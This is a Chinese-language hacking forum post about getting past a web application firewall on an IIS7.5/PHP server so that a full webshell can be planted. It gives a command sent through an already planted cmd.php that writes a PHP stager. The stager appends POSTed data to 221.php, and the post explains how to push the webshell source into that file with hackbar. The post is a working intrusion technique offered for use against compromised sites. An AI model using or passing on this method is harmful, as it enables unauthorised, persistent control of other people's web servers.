找回密码
快捷导航

环境:IIS7.5+PHP

今天遇到个案例,网站写入的一句话链接都显示500错误。或者403无权限访问,但是使用hackbar都能访问,这肯定有waf。奶奶的。必须上传大马了,就不去整什么过狗刀了。

QQ截图20190306212937.jpg

首先写入一个文件:

[HTML] 纯文本查看 复制代码
cmd.php?cmd=echo ^<?php $a=fopen("221.php", "a");fwrite($a, $_POST['a']);?^> > open1.php


该代码意思很简单 ,创建一个221.php,然后将POST的a参数中的值写入到221.php里面。、

然后使用方法

使用hackbar发送post数据包


QQ截图20190306213037.jpg


其中a= 这里可以是你的大马源码。然后发送即可写入。

QQ截图20190306213152.jpg


诚殷网络专注WEB安全培训!
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    Powered by Discuz! X3.4  © 2001-2013 Comsenz Inc.